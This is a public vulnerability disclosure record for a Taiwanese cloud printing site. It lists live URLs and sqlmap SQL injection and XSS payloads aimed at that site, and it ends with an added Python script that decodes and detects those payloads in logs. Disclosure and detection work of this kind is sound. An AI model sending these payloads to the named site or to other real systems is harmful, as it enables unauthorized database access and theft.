Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00206
- Vendor: 永豐紙業股份有限公司
- Title: 永豐雲端印刷網 SQL injection and XSS
- Introduction: SQL injection and XSS
Processing status
Current status
- Newly submitted
- Reviewed
- Reported to vendor
- Patch status not reported
- Not retested
- Public
Processing history
- 2016/09/15 03:27:21: Newly submitted (status updated by WhiteCat)
- 2016/09/26 09:13:19: Review completed (status updated by the HITCON ZeroDay service team)
- 2016/09/27 23:27:38: Reported, vendor did not respond (status updated by the HITCON ZeroDay service team)
- 2016/11/15 03:00:02: Public (status updated by the HITCON ZeroDay service team)
- 2016/11/17 01:00:04: Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2016-00206
- Reporter: andyw330 (WhiteCat)
- Risk: High
- Type: SQL Injection
References
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Related URLs
XSS:
http://www.cloudw2p.com/site/product4.php?type=alert("XSS")
SQL injection:
https://www.cloudw2p.com/site/logincheck.php
http://www.cloudw2p.com/site/member_Search_product.php
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Description
There are far too many vulnerable pages, so only some of the pages and injection points are listed.
https://www.cloudw2p.com/site/logincheck.php
Parameter: iid2 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: iid2=' AND 4365=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4365=4365) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'nsKd'='nsKd&ipass2=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: iid2=' AND 6106=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'LaLo'='LaLo&ipass2=
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
http://www.cloudw2p.com/site/member_Search_product.php
Parameter: BTYPE (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BTYPE=85-2' AND 4395=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4395=4395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'BVxy'='BVxy&OPDAYS1=3&PPID=100&number=3&ppWUNIT=56&num=3&WUNIT=&papertotle=168&UNIT702=15&num702=&totle702=0&ship2=75&ship=75&OPDAYS=3&Response=243
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
Parameter: obj (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 6940=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6940=6940) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'eVaC'='eVaC
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 4918=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'gWSy'='gWSy
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
Parameter: show (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all' AND 1054=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1054=1054) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'xeZr'='xeZr&page=2&&BTYPE=%&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 3785=3785 AND '%'='
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 9616=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9616=9616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Parameter: BTYPE (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 7206=7206 AND 'IkHL'='IkHL&iBOOKNAME=
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 4249=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4249=4249) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'csQp'='csQp&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
Parameter: WBID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 8402=8402 AND 'mrTO'='mrTO
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 6199=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6199=6199) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113))) AND 'JfVg'='JfVg
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf';WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(121)+CHAR(110)+CHAR(71)+CHAR(106)+CHAR(68)+CHAR(81)+CHAR(73)+CHAR(81)+CHAR(101)+CHAR(112)+CHAR(65)+CHAR(84)+CHAR(97)+CHAR(112)+CHAR(104)+CHAR(103)+CHAR(87)+CHAR(100)+CHAR(83)+CHAR(97)+CHAR(70)+CHAR(65)+CHAR(83)+CHAR(112)+CHAR(114)+CHAR(84)+CHAR(78)+CHAR(65)+CHAR(76)+CHAR(120)+CHAR(121)+CHAR(100)+CHAR(111)+CHAR(86)+CHAR(112)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(81)+CHAR(72)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- inee
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=Top') AND 7728=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7728=7728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))-- Xlnc
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: designername=Top') OR 8944=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- pmCF
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=') AND 2465=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2465=2465) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND ('jhUA'='jhUA&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: designername=');WAITFOR DELAY '0:0:5'--&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: designername=') UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(117)+CHAR(65)+CHAR(87)+CHAR(117)+CHAR(98)+CHAR(104)+CHAR(82)+CHAR(97)+CHAR(86)+CHAR(67)+CHAR(67)+CHAR(107)+CHAR(70)+CHAR(122)+CHAR(74)+CHAR(69)+CHAR(115)+CHAR(112)+CHAR(112)+CHAR(65)+CHAR(108)+CHAR(67)+CHAR(120)+CHAR(66)+CHAR(87)+CHAR(84)+CHAR(71)+CHAR(103)+CHAR(72)+CHAR(106)+CHAR(74)+CHAR(97)+CHAR(114)+CHAR(107)+CHAR(115)+CHAR(89)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dBwy&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 4246=4246 AND '%'='&O=X
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 5996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5996=5996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND '%'='&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
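The entries above are sqlmap output: for each injection point it records the parameter, the technique, the concrete payload and the generic vector. The error-based payloads spell their string literals as CHAR() chains and rely on SQL Server's CONVERT(INT, ...) conversion error echoing the non-numeric string back, framed by two five-letter delimiters; the heavy-query payloads cross-join sysusers seven times to burn time; the WAITFOR DELAY payloads need stacked queries. The following Python is an added example written for this page, not code from the reporter, HITCON ZeroDay or the vendor. It decodes the CHAR() chains, recovers the delimiters an error-based payload would leak, classifies a query string by technique, and scans access-log lines for the same patterns. The log lines are constructed to mirror the report's URLs (they are not real logs from the site), and the function names are my own.

```python
"""Decode and classify the sqlmap-style SQL Server payloads listed in this report.

Added example; not code from the reporter or the vendor. The access-log
lines below are constructed for illustration.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# A CHAR(n)+CHAR(m)+... chain: sqlmap emits these so the payload needs no quote characters.
CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.I)
CHAR_ONE = re.compile(r"CHAR\((\d+)\)", re.I)

# sqlmap frames the extracted value with two delimiters of the form q + 3 letters + q.
DELIMS = re.compile(r"'(q\w{3}q)'\+\(SELECT \(CASE WHEN .*? END\)\)\+'(q\w{3}q)'", re.I)

# Most specific signature first, so ';WAITFOR' is reported as stacked, not plain time-based.
TECHNIQUES = [
    ("stacked queries", re.compile(r";\s*(?:IF\s*\(.*?\)\s*)?WAITFOR\s+DELAY", re.I)),
    ("time-based blind (WAITFOR)", re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("time-based blind (heavy query)", re.compile(r"FROM\s+sysusers\s+AS\s+sys1", re.I)),
    ("error-based (CONVERT)", re.compile(r"CONVERT\(\s*INT\s*,\s*\(SELECT", re.I)),
    ("UNION query", re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    ("reflected XSS probe", re.compile(r"<script|alert\s*\(", re.I)),
]

# The logincheck.php iid2 payload, copied from the report.
IID2_PAYLOAD = (
    "iid2=' AND 4365=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)"
    "+(SELECT (CASE WHEN (4365=4365) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'nsKd'='nsKd&ipass2="
)


def decode_char_concat(sql: str) -> str:
    """Replace each CHAR() chain with the quoted literal it spells out."""
    def spell(m: "re.Match") -> str:
        return "'" + "".join(chr(int(n)) for n in CHAR_ONE.findall(m.group(0))) + "'"
    return CHAR_RUN.sub(spell, sql)


def error_marker(payload: str) -> Optional[str]:
    """For an error-based payload, return the string the server would echo when the
    injected condition is true (start delimiter + '1' + stop delimiter). SQL Server
    puts that string in its 'Conversion failed when converting the varchar value ...
    to data type int' message, which is how sqlmap reads the answer back."""
    m = DELIMS.search(decode_char_concat(payload))
    return None if m is None else m.group(1) + "1" + m.group(2)


def classify(query: str) -> Optional[str]:
    """Return the first technique whose signature appears in a decoded query string."""
    for name, pattern in TECHNIQUES:
        if pattern.search(query):
            return name
    return None


# Constructed Apache-style lines (not real logs). POST bodies, such as the
# logincheck.php iid2 injection, never reach an access log; catching those
# needs request-body logging or a WAF in front of the application.
LOG_LINES = [
    '203.0.113.7 - - [15/Sep/2016:03:10:02 +0800] "GET /site/design/mydesign_detail.php?'
    'WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Sep/2016:03:10:05 +0800] "GET /site/photo_show.php?'
    'show=all&page=2&&BTYPE=%25&iBOOKNAME=%25%27%20AND%203785%3D3785%20AND%20%27%25%27%3D HTTP/1.1" 200 9871',
    '198.51.100.4 - - [15/Sep/2016:03:11:40 +0800] "GET /site/product4.php?type=notebook HTTP/1.1" 200 3320',
    '203.0.113.7 - - [15/Sep/2016:03:12:19 +0800] "GET /site/design/mydesign_author.php?'
    'designername=Top%27%29%20OR%208944%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1'
    '%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5'
    '%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20pmCF HTTP/1.1" 200 44',
    '203.0.113.7 - - [15/Sep/2016:03:13:01 +0800] "GET /site/product4.php?type=alert(%22XSS%22) HTTP/1.1" 200 3401',
]
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (path, technique) for every request whose decoded query string carries a known payload."""
    findings = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        technique = classify(unquote_plus(query))
        if technique:
            findings.append((path, technique))
    return findings


if __name__ == "__main__":
    print(decode_char_concat(IID2_PAYLOAD))
    print("expected error text for a true condition:", error_marker(IID2_PAYLOAD))
    for path, technique in scan_access_log(LOG_LINES):
        print(f"{technique:32} {path}")
```

Decoding the iid2 payload shows the two delimiters sqlmap chose for that run ('qxvqq' and 'qvjjq'); a conversion error containing 'qxvqq1qvjjq' means the injected condition held, 'qxvqq0qvjjq' means it did not. The scanner is only a triage aid: it is keyed to the exact signatures in this report, it sees nothing that travels in a POST body, and time-based payloads against a patched site would still show up here as attempts, not as successes.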